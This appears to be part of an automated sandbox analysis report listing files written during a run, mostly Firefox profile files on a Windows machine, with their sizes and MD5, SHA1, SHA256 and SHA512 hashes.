SHA256b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e
SHA512ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26
-
Filesize
445KB
MD5c83ea72877981be2d651f27b0b56efec
SHA18d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA25613783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0
-
Filesize
4.5MB
MD55d153f73ce1b6a907cf87ddb04ba12b2
SHA1bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA2562af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA5120f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102
-
Filesize
1.8MB
MD58538c195a09066478922511ea1a02edf
SHA115e8910df845d897b4bb163caef4c6112570855b
SHA256d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA51260b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c
-
Filesize
3.1MB
MD52a48e7b047c5ff096c6dce52d4f26dbb
SHA1e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA25642642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA51275965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a
-
Filesize
1.7MB
MD5338a31056b3b81d48a292a7bf9af67c7
SHA1f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA5125bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc
-
Filesize
946KB
MD5c0caf5a901b162b6792eab9697827b5d
SHA1d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
SHA25628c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
SHA5123fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5
-
Filesize
1.7MB
MD58043b20e32ff2f0c75e9a3eed0c4bf07
SHA15464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
SHA25669a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
SHA51235639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c
-
Filesize
38KB
MD547177b7fbf1ce282fb87da80fd264b3f
SHA1d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9
-
Filesize
457KB
MD573636685f823d103c54b30bc457c7f0d
SHA1597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA2561edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7
-
Filesize
6.8MB
MD5dab2bc3868e73dd0aab2a5b4853d9583
SHA13dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA5123aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8
-
Filesize
1.8MB
MD5f155a51c9042254e5e3d7734cd1c3ab0
SHA19d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA51267ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a
-
Filesize
11.5MB
MD59da08b49cdcc4a84b4a722d1006c2af8
SHA17b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb
-
Filesize
350KB
MD5b60779fb424958088a559fdfd6f535c2
SHA1bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f
-
Filesize
48KB
MD5d39df45e0030e02f7e5035386244a523
SHA19ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA51269866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64
-
Filesize
415KB
MD5641525fe17d5e9d483988eff400ad129
SHA18104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA2567a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
-
Filesize
1024KB
MD5d0a56cd33f4917ccce9660312f2e2f45
SHA1c0948cb562f3a62b430789a5520475a624675680
SHA256d7bd83b880b413926f9487c9b6e295fd5cdd71b88e2988998d29016a5377e9bb
SHA512c835272405aed024d683f6e883672a37bdba2ba04b9063afbf2e1eae10980f952ff7171e123b3eda1fcc11f1b0336df03d717a29c8c168ab848d03fb712d1836
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
Filesize
717B
MD52b2ae07bb23617f2f0d316dcce383b8c
SHA1839721c2ad4a73cfcf76f2514a0b7505008a6f1a
SHA256e62d1fe3098e2a44c13f031271badc86fa075eb0d17c7b7814b43679c4bab7ae
SHA5122c281088e14d3ce4d07dd821ddfaf6d0275650bc2845d933bef54c9ba3d28caa6a62b9aa13bc7d06d5a303f341325759065eb35156296d7cbda850b6f96a025b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD56cb779084a4a54c5dfae4f07b5ed7d02
SHA18d8e7d52a023403943054af1fabd139bbdfbbc57
SHA256861578c8f0fbbcfd69a1b342bc26c0f5289ce7b050c9830123f222da7875c101
SHA512ec3b83b8678c529eb8c44afe3c24be87068d98a3e07c62ffa0f9f625c4cbf6f725100d793a7d33f745c718bc849b760ec11ebfca92dc80ae41078591f342cf35
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\83d89f60-d287-48c7-bf80-0c36061ff33d
Filesize745B
MD5711bdc4b9effd3ac9f20f20b49aff77d
SHA1b8bdf43293526c6ca5c061afafb8879f489a8108
SHA25646242560590ee1c7099c56cfe3512807686ad578365e43e8f750b4a3acdc8101
SHA512f7400df4cd75a251e8fd88185a6c002c5c0af36b80a3cbb16ebbafff7586829fc9ad8e1dabd3f0105e0f8c31c3f8678921079c5100d90e2fa79a5468796730cd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\a235d1f1-3c99-4844-9c4d-ef664963c167
Filesize12KB
MD53b911f40561733efbb7ef1f8b0061797
SHA1e989039184feb69005e0d0cbffe050c6cba4baaf
SHA2568e8babdfc7de4c3fd983f4a5cfb1a87638eaff965de8471dea78adfce0208ee3
SHA512e9954c282831a29676acbb091c1ccb5badeba1c98a727d6c57e267e3e4948ce309189ef5edf9196b9ae1cf5e0f6d75e45ea6d69f1c9db518b348f616137e0a7f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD5fc50585b0063e57b067bc2eccfdc7b1c
SHA137a3062d353214d44ecb9f1cdb6018395c929d25
SHA2560fdc23e93b8ca26bc3b3ea26d882dde25f8ca2a9efae3b33b75ff16b9e5abc3e
SHA5125680fdf83b422c9874b7900a6e24164f579456b2bd52d7e6ddd6d26dcbd51c9490393ae54904d6d25302e41a0095da61ab905a2f094e0158b1cddc8eb4182bde
-
Filesize
6KB
MD525593dad9a83536ef6becca2312ba023
SHA115a05338ad035f96d9f0b6b9d356e5ddbcbd8537
SHA256a8518ebaee54f62745047f953c5d118b875bbdc72ebe10d3bc6c91eec0a35e57
SHA5125b74e3d0036384872af7309c136150230d86aaf1a65c8a9193ba3e2f8ffbc01fd6f9bf1d63dbfee74c038c9b51b76bfd74f01a90f520a2b0a8c872126d90dba9
-
Filesize
6KB
MD59dc7f05134ea58b5e327e653607f35a1
SHA1fd7cf07194cbc4c11702da74244775295669bede
SHA256d0cc6fce653a2c1351e50c1730aaa61d132a6562de3efa382a94ec1dc0c0502b
SHA51240eb82a56188d0caafd57ccbe891c19b3085ea5c33a8a4045d56570279a007a164a22ac195d3bdebc7c66ed70bba7bb8fda320926d318dc71210dbf11421d17d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5b9fc62c23c5d1e08e35944e848c27c49
SHA19063ff1d82ffa3a74f85100d579ddfb794fb49bd
SHA2562e19f17ad09d2c178fda6ab4612fa62c19a2c7cd9509e179c6236552908b60ea
SHA5128645116b34bc2cc0a848c0edc0892eb8287e721df37914cb803dbd6b9eebab8cf2972f2b4d2066ee674866b7f7dca19e79026735186b363d25056f853bf5a1ef
-
Filesize
1KB
MD5cd2bdaf463be216b1a3cfae3774a6041
SHA18a30d9d8e9318feece57eb26dda7defbc5722568
SHA2561afc2faf495971b14118266518ef19402173260677a40e837f01e5dd88d01e9e
SHA5127298832a143715727c59330cf588884d53bf83e62a1f995fa6ba2d550b76996e3ce291f3a6e01e97b30cdd0bd7f3c7d6562c47d9c99bcbb3b6f6c52fd104def1
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773